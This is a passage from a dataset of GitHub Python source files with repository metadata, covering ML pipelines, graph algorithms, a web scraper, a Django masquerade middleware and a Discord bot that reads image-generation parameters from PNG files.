evlockSpktimes['missingTrials']\n","repo_name":"sjara/jaratest","sub_path":"common/2018rc/testgen_randomize_trials.py","file_name":"testgen_randomize_trials.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18467270920","text":"from metaflow import FlowSpec, step, Parameter\nimport det\nimport os\n\ndef script_path(filename):\n    \"\"\"\n    A convenience function to get the absolute path to a file in this\n    tutorial's directory. 
This allows the tutorial to be launched from any\n    directory.\n\n    \"\"\"\n    filepath = os.path.dirname(__file__)\n    return os.path.join(filepath, filename)\n\n\nclass DeterminedFlow(FlowSpec):\n    \"\"\"\n    A flow to train a model on Determined.\n\n    \"\"\"\n\n    det_master = Parameter('det-master',\n                           help='Determined Master IP',\n                           default=\"localhost:8080\")\n\n    config_file = Parameter('config-file',\n                            help='Configuration file for experiment',\n                            default='local.yaml')\n\n    local_exp_dir = Parameter('local-exp-dir',\n                              help='Directory with experiment code',\n                              default=\"albert_squad_pytorch\")\n\n    @step\n    def start(self):\n        \"\"\"\n        Placeholder step to process and transform data\n\n        \"\"\"\n        self.data = \"example data\"\n\n        print(f\"This is your data: {self.data}\")\n\n        # Proceed with the model training.\n        self.next(self.train)\n\n    @step\n    def train(self):\n        \"\"\"\n        This step uses the data processed in the previous step to train the model using a model definition from a Github repo.\n        \"\"\"\n\n        # Override parameters if manually set by user\n        det_master = self.det_master\n        config_file = self.config_file\n        local_exp_dir = self.local_exp_dir\n\n        # Setup example by cloning example repo and installing the Determined CLI\n        det.setup()\n\n        # Submit determined experiment via CLI and wait for completion\n        experiment_id = det.submit(det_master, config_file, local_exp_dir)\n\n        self.experiment_id = experiment_id\n        self.next(self.get_metrics)\n\n    @step\n    def get_metrics(self):\n        \"\"\"\n        Get metric from top checkpoint\n\n        \"\"\"\n\n        metric = det.get_metrics(self.det_master, self.experiment_id)\n\n        print(f\"TOP METRIC: {metric}\")\n\n        # Set metric to beat\n        metric_to_beat = 0\n        # This should always pass\n        if float(metric) > metric_to_beat:\n            print(f\"Current metric {metric} is greater than metric to beat {metric_to_beat} - continuing pipeline\")\n        \n        self.next(self.end)\n\n    @step\n    def end(self):\n        \"\"\"\n        Confirm completion of Flow\n        \"\"\"\n\n        print(\"This flow is now complete.\")\n\nif __name__ == '__main__':\n    DeterminedFlow()\n","repo_name":"determined-ai/works-with-determined","sub_path":"metaflow/example-determined.py","file_name":"example-determined.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"36343197967","text":"import numpy as np\n\n# Local imports\nfrom .visualiserBase import Visualiser\n\n\nclass VisualiserBoundingBoxes(Visualiser):\n\n    data_type = 'boundingBoxes'\n\n    def __init__(self, data):\n        self.set_data(data)\n\n    def set_data(self, data):\n        self.__data = {}\n        self.__data.update(data)\n\n    def get_data(self):\n        return self.__data\n\n    def get_frame(self, time, timeWindow, **kwargs):\n        if self.__data is None or not kwargs.get('show_bounding_boxes', True):\n            return None\n        gt_bb = self.__data\n        indices = abs(gt_bb['ts'] - time) < timeWindow\n        if not any(indices):\n            if not kwargs.get('interpolate'):\n                return None\n        if kwargs.get('interpolate'):\n            boxes = []\n            for label in np.unique(gt_bb['label']):\n                label_mask = gt_bb['label'] == label\n                ts = gt_bb['ts'][label_mask]\n                minY = gt_bb['minY'][label_mask]\n                minX = gt_bb['minX'][label_mask]\n                maxY = gt_bb['maxY'][label_mask]\n                maxX = gt_bb['maxX'][label_mask]\n\n                i1 = np.searchsorted(ts, time)\n                i0 = i1 - 1\n                if i0 < 0:\n                    if abs(ts[0] - time) < timeWindow:\n                        if kwargs.get('with_labels', True) and 'label' in gt_bb.keys():\n                            boxes.append((minY[0], minX[0], maxY[0], maxX[0], label))\n                        else:\n                            boxes.append((minY[0], 
minX[0], maxY[0], maxX[0]))\n                        continue\n                    else:\n                        continue\n                if i1 >= len(ts):\n                    if abs(ts[-1] - time) < timeWindow:\n                        if kwargs.get('with_labels', True) and 'label' in gt_bb.keys():\n                            boxes.append((minY[-1], minX[-1], maxY[-1], maxX[-1], label))\n                        else:\n                            boxes.append((minY[-1], minX[-1], maxY[-1], maxX[-1]))\n                        continue\n                    else:\n                        continue\n\n                minY_interp = minY[i0] + ((minY[i1] - minY[i0]) / abs(ts[i1] - ts[i0])) * (time - ts[i0])\n                minX_interp = minX[i0] + ((minX[i1] - minX[i0]) / abs(ts[i1] - ts[i0])) * (time - ts[i0])\n                maxY_interp = maxY[i0] + ((maxY[i1] - maxY[i0]) / abs(ts[i1] - ts[i0])) * (time - ts[i0])\n                maxX_interp = maxX[i0] + ((maxX[i1] - maxX[i0]) / abs(ts[i1] - ts[i0])) * (time - ts[i0])\n                if kwargs.get('with_labels', True) and 'label' in gt_bb.keys():\n                    boxes.append((minY_interp, minX_interp, maxY_interp, maxX_interp, label))\n                else:\n                    boxes.append((minY_interp, minX_interp, maxY_interp, maxX_interp))\n            boxes = np.array(boxes).astype(int)\n        else:\n            boxes = np.column_stack((gt_bb['minY'][indices], gt_bb['minX'][indices],\n                                     gt_bb['maxY'][indices], gt_bb['maxX'][indices])).astype(int)\n            if kwargs.get('with_labels', True) and 'label' in gt_bb.keys():\n                labels = gt_bb['label'][indices].astype(int)\n                boxes = np.column_stack([boxes, labels])\n        boxes = np.unique(boxes, axis=0)\n        return boxes\n\n    def get_settings(self):\n        settings = {'with_labels': {'type': 'boolean',\n                                    'default': True\n                                    },\n                    'show_bounding_boxes': {'type': 'boolean',\n                                            'default': True\n                                            },\n                    'interpolate': {'type': 'boolean',\n                                    'default': False\n                                    }\n                    }\n        return settings\n","repo_name":"event-driven-robotics/bimvee","sub_path":"bimvee/visualisers/visualiserBoundingBoxes.py","file_name":"visualiserBoundingBoxes.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"29595900495","text":"import argparse\nimport json\nfrom collections import Counter\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm, trange\n\nfrom Modules.MLP import MLP\nfrom utils.dataset import MulAttDataset\nfrom utils.config import init_opts, train_opts, eval_opts, multihead_att_opts\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--seed', default=2021, type=int)\nparser.add_argument('--gpu', default=0, type=int)\nparser.add_argument('--name', default=\"med-bert\", type=str)\nparser.add_argument('--cleaned_path', default='./cleaned', type=str)\n\nparser.add_argument('--dr_dialog_sample', default=2, type=int)\nparser.add_argument('--neg_sample', default=2, type=int)\nparser.add_argument('--batch_size', default=2, type=int)\nparser.add_argument('--lr', default=2e-5, type=float)\nparser.add_argument('--patience', default=7, type=int)\nparser.add_argument('--output_dir', default=\"saved_model\", type=str)\nparser.add_argument('--epoch_num', default=10, type=int)\n\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\ntorch.cuda.set_device(args.gpu)\n\nprint(f'Prediction: random seed {args.seed}, experiment name: {args.name}, run on gpu {args.gpu}')\n\ndef main():\n    print(f'{args.name} start!')\n    print(f'Loading embeddings from {args.cleaned_path}...')\n    profile_ids = load_pickle(f'{args.cleaned_path}/profile_ids_mini.pkl')\n    print(\"Loaded profile ids\")\n    query_ids = load_pickle(f'{args.cleaned_path}/q_ids_mini.pkl')\n    
print(\"Loaded query ids\")\n dialogue_ids = load_pickle(f'{args.cleaned_path}/dialog_ids_mini.pkl')\n print(\"Loaded dialogue ids\")\n end = time.time()\n \n print('Building test dataset and dataloader...')\n test_set = pd.read_csv(f'./dataset/test_mini.csv', delimiter='\\t', encoding='utf-8', dtype={'dr_id': str})\n test_dataset = DoctorRecDataset(\n 'test', test_set, profile_ids, query_ids, dialogue_ids,\n dr_dialog_sample=args.dr_dialog_sample, neg_sample=args.neg_sample\n )\n test_dataloader = DataLoader(test_dataset, batch_size=args.batch_size, shuffle=True)\n del test_set, test_dataset, profile_ids, query_ids, dialogue_ids,\n print('Done')\n \n model = ourModel()\n model_path = f'{args.output_dir}/ckpt/{args.eval_model}'\n model.load_state_dict(torch.load(model_path))\n if torch.cuda.is_available():\n model = model.cuda()\n model.eval()\n \n print(f'{args.name} start prediction...')\n with open(f'{args.output_dir}/test_{args.eval_model}_score.txt', 'w', encoding='utf-8') as score:\n with torch.no_grad():\n pred_scores = test_process(test_dataloader, model)\n for pred_score in pred_scores:\n print(pred_score.cpu().detach().numpy().tolist()[0], file = score)\n\nif __name__ == '__main__':\n main()","repo_name":"ewayuan/DocRec","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6916663825","text":"import string\nimport time\nimport os\n\nos.system('clear || cls')\n\nwith open(\"mytext.txt\", 'r', encoding=\"utf-8\") as f:\n text = f.read()\n\n# print(len(text))\n# print(text.count(' '))\n\ndef count_words(text):\n d = {}\n\n # Убираем заглавные буквы\n text = text.lower()\n\n # Избавляемся от знаков припинания (пунктуации)\n text = text.translate(text.maketrans('', '', string.punctuation))\n\n for word in text.split():\n d[word] = d.get(word, 0) + 1\n\n # Составляем рейтинг слов\n\n word_chart = []\n\n for key, val in d.items():\n word_chart.append((val, key))\n\n word_chart = sorted(word_chart, reverse=True)\n\n return word_chart\n\n\nres = count_words(text)[:5]\n\n# Фильтруем результат с использованием стоп листа\n\nwith open('stoplist.txt', 'r', encoding='utf-8') as f:\n stoplist = f.read().split()\n\n\n# print(stoplist)\n\n# Вносим поправки в стоплист\n\nmy_stop = 'иль ним пред меж сей свой моей'\n\nstoplist = stoplist + my_stop.split()\n\nchart = count_words(text)\n\nfiltered_chart = [w for w in chart if len(w[1]) > 2 and w[1] not in stoplist]\n\n\ntitle = \"Результат частотного анализа\\n\"\nprint(len(title) * \"=\")\nprint(title)\n\nfor count, word in filtered_chart[:10]:\n h = \"#\" * (count // 10)\n time.sleep(0.1)\n print(h, count, word)\n\n\nprint(len(title) * \"=\")","repo_name":"aleksmn/PythonLessons","sub_path":"text-parser/old_main.py","file_name":"old_main.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27806945647","text":"\ndef evennumbers():\n i = 1\n even = []\n while i <=100:\n if i%2 ==0:\n even.append(i)\n i = i + 1\n return even\ndef oddnumbers():\n i = 1\n odd = []\n while i <=100:\n if i%2 !=0:\n odd.append(i)\n i = i + 1\n return odd\n\nprint(\"the even numbers are:\",evennumbers())\nprint(\"the odd numbes are:\",oddnumbers())","repo_name":"Dipjitbaroi/python-basics","sub_path":"loop 2.py","file_name":"loop 
2.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9354191246","text":"class User:\n \n def __init__(self, name):\n self.name = name\n self.amount = 0\n \n def make_deposit(self, amount):\n self.amount += amount\n \n def display_user_balance(self):\n print(f\"User: {self.name}, Balance: {self.amount}\")\n \n def make_withdrawal(self, amount):\n self.amount -= amount\n \n\njosh = User(\"Josh\")\nkyle = User(\"Kyle\")\njeremy = User(\"Jeremy\")\n\njosh.make_deposit(100)\njosh.make_deposit(200)\njosh.make_deposit(50)\njosh.make_withdrawal(45)\njosh.display_user_balance()\nkyle.make_deposit(100)\nkyle.make_deposit(200)\nkyle.make_deposit(50)\nkyle.make_withdrawal(45)\nkyle.make_withdrawal(110)\nkyle.display_user_balance()\njeremy.make_deposit(100)\njeremy.make_withdrawal(20)\njeremy.make_withdrawal(50)\njeremy.make_withdrawal(45)\njeremy.display_user_balance()","repo_name":"joshmmiller2/user_assignment_Joshua_Miller","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13761091813","text":"from graph_package.graph import Graph\nimport numpy as np\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nthis script will find the SCC of a graph\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\ndef dfs(g, start, visited=None):\n \"\"\"this is an exploration DFS, meanning it will return a list of\n all the reachable Nodes starting from 'start'\n\n Args:\n g: Graph\n start: starting node\n visited: default=None, supplying the unwanted list of node to explore\n \"\"\"\n if visited is None:\n visited = []\n visited.append(start)\n stack = []\n\n def dfs_helper(src):\n nonlocal stack, visited\n for dst in g[src]:\n if dst.key not in visited:\n visited.append(dst.key)\n dfs_helper(dst.key)\n\n stack.append(src)\n\n dfs_helper(start)\n return stack\n\n\ndef find_SSC(g):\n # getting the order of closing time with DFS\n stack = []\n for v in g.get_vertices():\n if v.key not in stack:\n stack.extend(dfs(g, v.key, stack.copy()))\n\n # transposing the matrix\n mat = g.container.graph\n g.container.graph = np.array(mat).T.tolist()\n\n # apply DFS again on each SCC\n ssc_list = []\n visited = []\n for v in stack[::-1]:\n if v not in visited:\n ssc = dfs(g, v, visited)\n ssc_list.append(ssc)\n visited.extend(ssc.copy())\n\n return ssc_list\n\n\n\n\nif __name__ == \"__main__\":\n\n \"\"\"this is from page 118 lecture 1\"\"\"\n test_graph = {'s': {'v': 1},\n 'v': {'w': 1},\n 'w': {'s': 1},\n 'q': {'w': 1, 's': 1, 't': 1},\n 't': {'x': 1, 'y': 1},\n 'x': {'z': 1},\n 'z': {'x': 1},\n 'y': {'q': 1},\n 'r': {'u': 1, 'y': 1},\n 'u': {'y': 1}\n }\n\n # \"\"\"this is from page 116 lecture 1\"\"\"\n # test_graph = {'a': {'b': 1},\n # 'b': {'c': 1, 'f': 1},\n # 'c': {'d': 1, 'g': 1},\n # 'd': {'c': 1, 'h': 1},\n # 'e': {'a': 1, 'f': 1},\n # 'f': {'g': 1},\n # 'g': {'f': 1, 'h': 1},\n # 'h': {'h': 1}\n # }\n\n # MUST be matrix. 
we don't support transpose on lists\n    g = Graph(directed=True, container='matrix')\n    for src, neighbors in test_graph.items():\n        for dst, _ in neighbors.items():\n            g.add_edge(src, dst)\n\n\n    print(f'SCC: {find_SCC(g)}')\n","repo_name":"shalip91/Algorithms","sub_path":"graph/dfs_scc_kusaraju.py","file_name":"dfs_scc_kusaraju.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40559444724","text":"#!/bin/python3\nimport argparse\nimport sa\nimport test\n\ndef main():\n    parser = argparse.ArgumentParser(description='Simulated Annealing for Node Clustering.')\n    parser.add_argument('-number_of_clusters', \n                        type=int,\n                        default=3,\n                        help='the number of clusters that should be generated')\n    parser.add_argument('-initial_temperature', \n                        type=int,\n                        default=10000,\n                        help='the initial temperature for simulated annealing')\n    parser.add_argument('-final_temperature', \n                        type=int, \n                        default=10,\n                        help='the temperature that, when reached, finishes the algorithm')\n    parser.add_argument('-temperature_change', \n                        type=float,\n                        default=0.05,\n                        help='update rate for the temperature')\n    parser.add_argument('-iterations_per_temperature', \n                        type=int,\n                        default=1,\n                        help='the number of random movements between two temperature changes')\n\n    args = parser.parse_args()\n    check_arguments(args)\n    print_args(args)\n    runner = sa.SA(test.get_big_test_graph(),\n                   args.number_of_clusters,\n                   args.initial_temperature,\n                   args.final_temperature,\n                   args.temperature_change,\n                   args.iterations_per_temperature)\n    runner.run()\n    \ndef check_arguments(args):\n    if args.initial_temperature <= 0:\n        print(\"Error: initial temperature must be positive.\")\n        exit()\n    if args.initial_temperature < args.final_temperature:\n        print(\"Error: initial temperature is less than final temperature.\")\n        exit()\n    if args.temperature_change >= 1.0 or args.temperature_change <= 0:\n        print(\"Error: temperature change must be between 0 and 1.0 exclusive.\")\n        exit()\n    if args.iterations_per_temperature <= 0:\n        print(\"Error: iterations per temperature must be positive\")\n        exit()\n    if args.number_of_clusters <= 1:\n        print(\"Error: number of clusters must be more than 1\")\n        exit()\n\ndef print_args(args):\n    print(\"Running SA-Clustering.\\nNumber of clusters: {}\\nInitial temp: {}\\nFinal temp: {}\\nTemp update factor: {}\\nIterations per update: {}\\n\"\n          .format(args.number_of_clusters, \n                  args.initial_temperature, \n                  args.final_temperature, \n                  args.temperature_change, \n                  args.iterations_per_temperature))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"MysteriousProgrammer/SimulatedAnnealingClustering","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37364526299","text":"import pygame as pg\nfrom settings import *\nvec = pg.math.Vector2\n\nclass Button:\n    def __init__(self, surface, x, y, text):\n        self.surface = surface\n        self.x = x\n        self.y = y\n        self.width = 150\n        self.text = text\n        self.height = 50\n        self.clicked = False\n        self.hovering = False\n        self.image = pg.Surface((self.width, self.height))\n        self.rect = self.image.get_rect()\n\n    def update(self):\n        # track the hover state from the current mouse position\n        pos = pg.mouse.get_pos()\n        self.hovering = pg.Rect(self.x, self.y, self.width, self.height).collidepoint(pos)\n\n    def draw(self):\n        action = False\n\n        # get mouse position\n        pos = pg.mouse.get_pos()\n\n        # create pygame Rect object for the button\n        
button_rect = pg.Rect(self.x, self.y, self.width, self.height)\n        # check mouseover and clicked conditions\n        if button_rect.collidepoint(pos):\n            if pg.mouse.get_pressed()[0] == 1:\n                self.clicked = True\n                pg.draw.rect(self.surface, PURPLE, button_rect)\n            elif pg.mouse.get_pressed()[0] == 0 and self.clicked:\n                self.clicked = False\n                action = True\n            else:\n                pg.draw.rect(self.surface, LIGHTBLUE2, button_rect)\n        else:\n            pg.draw.rect(self.surface, LIGHTBLUE, button_rect)\n\n        # add text to button\n        font = pg.font.SysFont(\"arial\", 25)\n        text_img = font.render(self.text, True, BLACK)\n        text_len = text_img.get_width()\n        self.surface.blit(text_img, (self.x + int(self.width / 2) - int(text_len / 2), self.y + 13))\n\n        return action\n","repo_name":"erikjny/sudoku","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25999268226","text":"# This module scrapes the Severn Bridges website for the status of each bridge.\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\n\nclass BridgeStatus:\n    \"\"\"Class for keeping bridge status data together\"\"\"\n    def __init__(self):\n        # fetch once so the page is only scraped a single time\n        self.m4, self.m48 = self.bridge_status()\n        self.timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n    def bridge_status(self) -> tuple:\n        \"\"\"Parses the web path provided and returns the status of each bridge\n        as a tuple of strings\"\"\"\n\n        WEB_PATH = \"https://nationalhighways.co.uk/travel-updates/the-severn-bridges/\"\n        try:\n            # Get web page\n            source = requests.get(WEB_PATH).text\n\n            if source:\n                soup = BeautifulSoup(source, features=\"html.parser\")\n                bridge_status = soup.find_all(\"div\", {\"class\": \"severn-crossing-status__heading\"})\n\n                m4 = bridge_status[0].text\n                m48 = bridge_status[1].text\n\n                return (m4, m48)\n        except Exception:\n            print('sorry, could not find the status')\n\nbridges = BridgeStatus()\nbridges_dict = vars(bridges)  # Creates dict of bridges attributes\n\n\n\n\n","repo_name":"Revill74/severn_bridges","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9273733283","text":"from .pages.product_page import ProductPage\n\n\ndef test_should_be_add_to_cart_button(browser):\n    link = \"http://selenium1py.pythonanywhere.com/\"\n    page = ProductPage(browser, link)\n    page.open()\n    page.should_be_add_to_cart_button()\n    page.solve_quiz_and_get_code()\n\n","repo_name":"elenababayan/exam","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26535377265","text":"import json\nimport add\nimport view\nfrom pprint import pprint\nfrom random import randint as rd, choice as ch\ndef work():\n    add.add_random('Words.json')\n    add.Write(add.data, 'Words.json')\n    print('Do you want to see the whole list, or a specific entry? 
')\n    print('For the whole list type print; for a specific entry type search')\n    def choose(i):\n        # read the user's choice (calling input, not stringifying the input function itself)\n        i = input()\n        if i == \"search\":\n            number = int(input('Which entry are you interested in? '))\n            view.search('Words.json', number)\n        elif i == \"print\":\n            view.show_base('Words.json')\n","repo_name":"Nameuser9/First_try_in_the_chapter_development","sub_path":"Словарь модель вторая/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24894140909","text":"from ..middleware import MiddlewareBase\nfrom .perms import can_masquerade\nfrom .settings import get_user_attr, is_enabled\nfrom .util import get_masquerade_user, is_masquerading\n\n\nclass MasqueradeMiddleware(MiddlewareBase):\n\n    def enabled(self):\n        return is_enabled()\n\n    def before_view(self, request):\n        masquerade_info = {}\n        actual_user = request.user\n        if is_masquerading(request):\n            request.user = get_masquerade_user(request, source='session')\n            masquerade_info.update({\n                'actual_user': actual_user,\n                'can_masquerade': True,\n                'is_masquerading': True,\n            })\n        else:\n            masquerade_info.update({\n                'can_masquerade': can_masquerade(actual_user),\n                'is_masquerading': False,\n            })\n        setattr(request.user, get_user_attr(), masquerade_info)\n","repo_name":"PSU-OIT-ARC/django-arcutils","sub_path":"arcutils/masquerade/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22293583405","text":"import gzip\nimport io\nimport os\nimport toml\nimport asyncio\n\nfrom discord import Intents, Embed, ButtonStyle, Message, Attachment, File, RawReactionActionEvent, ApplicationContext\nfrom discord.ext import commands\nfrom discord.ui import View, button\nfrom dotenv import load_dotenv\nfrom PIL import Image\nfrom collections import OrderedDict\n\nload_dotenv()\nCONFIG = toml.load('config.toml')\nMONITORED_CHANNEL_IDS = CONFIG.get('MONITORED_CHANNEL_IDS', [])\nSCAN_LIMIT_BYTES = CONFIG.get('SCAN_LIMIT_BYTES', 10 * 1024**2)  # Default 10 MB\n\nintents = Intents.default() | Intents.message_content | Intents.members\nclient = commands.Bot(intents=intents)\n\n\ndef get_params_from_string(param_str):\n    output_dict = {}\n    parts = param_str.split('Steps: ')\n    prompts = parts[0]\n    params = 'Steps: ' + parts[1]\n    if 'Negative prompt: ' in prompts:\n        output_dict['Prompt'] = prompts.split('Negative prompt: ')[0]\n        output_dict['Negative Prompt'] = prompts.split('Negative prompt: ')[1]\n        if len(output_dict['Negative Prompt']) > 1000:\n            output_dict['Negative Prompt'] = output_dict['Negative Prompt'][:1000] + '...'\n    else:\n        output_dict['Prompt'] = prompts\n        if len(output_dict['Prompt']) > 1000:\n            output_dict['Prompt'] = output_dict['Prompt'][:1000] + '...'\n    params = params.split(', ')\n    for param in params:\n        try:\n            key, value = param.split(': ')\n            output_dict[key] = value\n        except ValueError:\n            pass\n    return output_dict\n\n\ndef get_embed(embed_dict, context: Message):\n    embed = Embed(color=context.author.color)\n    for key, value in embed_dict.items():\n        embed.add_field(name=key, value=value, inline='Prompt' not in key)\n    embed.set_footer(text=f'Posted by {context.author}', icon_url=context.author.display_avatar)\n    return embed\n\n\ndef read_info_from_image_stealth(image):\n    # trying to read stealth pnginfo\n    width, height = image.size\n    pixels = image.load()\n\n    has_alpha = True if image.mode == 'RGBA' else 
False\n mode = None\n compressed = False\n binary_data = ''\n buffer_a = ''\n buffer_rgb = ''\n index_a = 0\n index_rgb = 0\n sig_confirmed = False\n confirming_signature = True\n reading_param_len = False\n reading_param = False\n read_end = False\n for x in range(width):\n for y in range(height):\n if has_alpha:\n r, g, b, a = pixels[x, y]\n buffer_a += str(a & 1)\n index_a += 1\n else:\n r, g, b = pixels[x, y]\n buffer_rgb += str(r & 1)\n buffer_rgb += str(g & 1)\n buffer_rgb += str(b & 1)\n index_rgb += 3\n if confirming_signature:\n if index_a == len('stealth_pnginfo') * 8:\n decoded_sig = bytearray(int(buffer_a[i:i + 8], 2) for i in\n range(0, len(buffer_a), 8)).decode('utf-8', errors='ignore')\n if decoded_sig in {'stealth_pnginfo', 'stealth_pngcomp'}:\n confirming_signature = False\n sig_confirmed = True\n reading_param_len = True\n mode = 'alpha'\n if decoded_sig == 'stealth_pngcomp':\n compressed = True\n buffer_a = ''\n index_a = 0\n else:\n read_end = True\n break\n elif index_rgb == len('stealth_pnginfo') * 8:\n decoded_sig = bytearray(int(buffer_rgb[i:i + 8], 2) for i in\n range(0, len(buffer_rgb), 8)).decode('utf-8', errors='ignore')\n if decoded_sig in {'stealth_rgbinfo', 'stealth_rgbcomp'}:\n confirming_signature = False\n sig_confirmed = True\n reading_param_len = True\n mode = 'rgb'\n if decoded_sig == 'stealth_rgbcomp':\n compressed = True\n buffer_rgb = ''\n index_rgb = 0\n elif reading_param_len:\n if mode == 'alpha':\n if index_a == 32:\n param_len = int(buffer_a, 2)\n reading_param_len = False\n reading_param = True\n buffer_a = ''\n index_a = 0\n else:\n if index_rgb == 33:\n pop = buffer_rgb[-1]\n buffer_rgb = buffer_rgb[:-1]\n param_len = int(buffer_rgb, 2)\n reading_param_len = False\n reading_param = True\n buffer_rgb = pop\n index_rgb = 1\n elif reading_param:\n if mode == 'alpha':\n if index_a == param_len:\n binary_data = buffer_a\n read_end = True\n break\n else:\n if index_rgb >= param_len:\n diff = param_len - index_rgb\n if diff < 0:\n buffer_rgb = buffer_rgb[:diff]\n binary_data = buffer_rgb\n read_end = True\n break\n else:\n # impossible\n read_end = True\n break\n if read_end:\n break\n if sig_confirmed and binary_data != '':\n # Convert binary string to UTF-8 encoded text\n byte_data = bytearray(int(binary_data[i:i + 8], 2) for i in range(0, len(binary_data), 8))\n try:\n if compressed:\n decoded_data = gzip.decompress(bytes(byte_data)).decode('utf-8')\n else:\n decoded_data = byte_data.decode('utf-8', errors='ignore')\n return decoded_data\n except:\n pass\n return None\n\n\n@client.event\nasync def on_ready():\n print(f\"Logged in as {client.user}!\")\n\n\n@client.event\nasync def on_message(message: Message):\n if message.channel.id in MONITORED_CHANNEL_IDS and message.attachments:\n attachments = [a for a in message.attachments if a.filename.lower().endswith(\".png\") and a.size < SCAN_LIMIT_BYTES]\n for i, attachment in enumerate(attachments): # download one at a time as usually the first image is already ai-generated\n metadata = OrderedDict()\n await read_attachment_metadata(i, attachment, metadata)\n if metadata:\n await message.add_reaction('🔎')\n return\n\n\nclass MyView(View):\n def __init__(self):\n super().__init__(timeout=3600, disable_on_timeout=True)\n self.metadata = None\n\n @button(label='Full Parameters', style=ButtonStyle.green)\n async def details(self, button, interaction):\n button.disabled = True\n await interaction.response.edit_message(view=self)\n if len(self.metadata) > 1980:\n with io.StringIO() as f:\n 
f.write(self.metadata)\n                f.seek(0)\n                await interaction.followup.send(file=File(f, \"parameters.yaml\"))\n        else:\n            await interaction.followup.send(f\"```yaml\\n{self.metadata}```\")\n\n\nasync def read_attachment_metadata(i: int, attachment: Attachment, metadata: OrderedDict):\n    \"\"\"Allows downloading in bulk\"\"\"\n    try:\n        image_data = await attachment.read()\n        with Image.open(io.BytesIO(image_data)) as img:\n            if img.info:\n                if 'parameters' in img.info:\n                    info = img.info['parameters']\n                elif 'prompt' in img.info:\n                    info = img.info['prompt']\n                elif img.info.get('Software') == 'NovelAI':  # .get avoids a KeyError when the tag is absent\n                    info = img.info[\"Description\"] + img.info[\"Comment\"]\n                else:\n                    info = read_info_from_image_stealth(img)\n    \n                if info:\n                    metadata[i] = info\n    except Exception as error:\n        print(f\"{type(error).__name__}: {error}\")\n\n\n@client.event\nasync def on_raw_reaction_add(ctx: RawReactionActionEvent):\n    \"\"\"Send image metadata in reacted post to user DMs\"\"\"\n    if ctx.emoji.name != '🔎' or ctx.channel_id not in MONITORED_CHANNEL_IDS or ctx.member.bot:\n        return\n    channel = client.get_channel(ctx.channel_id)\n    message = await channel.fetch_message(ctx.message_id)\n    if not message:\n        return\n    attachments = [a for a in message.attachments if a.filename.lower().endswith(\".png\")]\n    if not attachments:\n        return\n    metadata = OrderedDict()\n    tasks = [read_attachment_metadata(i, attachment, metadata) for i, attachment in enumerate(attachments)]\n    await asyncio.gather(*tasks)\n    if not metadata:\n        return\n    user_dm = await client.get_user(ctx.user_id).create_dm()\n    for attachment, data in [(attachments[i], data) for i, data in metadata.items()]:\n        try:\n\n            if 'Steps:' in data:\n                params = get_params_from_string(data)\n                embed = get_embed(params, message)\n                embed.set_image(url=attachment.url)\n                custom_view = MyView()\n                custom_view.metadata = data\n                await user_dm.send(view=custom_view, embed=embed, mention_author=False)\n            else:\n                img_type = 